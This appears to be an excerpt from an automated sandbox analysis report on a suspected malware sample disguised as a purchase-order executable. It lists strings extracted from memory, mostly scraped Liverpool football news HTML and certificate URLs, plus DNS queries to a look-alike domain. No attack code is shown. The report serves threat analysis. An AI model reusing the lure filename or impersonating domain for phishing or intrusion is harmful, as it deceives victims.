publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text 
publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
                      Source: unknownDNS traffic detected: queries for: myliverpoolnews.cf
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: 77EC63BDA74BD0D0E0426DC8F8008506.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://ocsp.digicert.com0C
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://ocsp.digicert.com0O
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.484366830.0000000005117000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: 08042021New-PurchaseOrder.exeString found in binary or memory: http://www.digicert.com/CPS0
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289217407.00000000024B6000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                      Source: powershell.exe, 00000008.00000003.391009899.0000000008E79000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: AdvancedRun.exe, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.drString found in binary or memory: http://www.nirsoft.net/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
                      Source: powershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
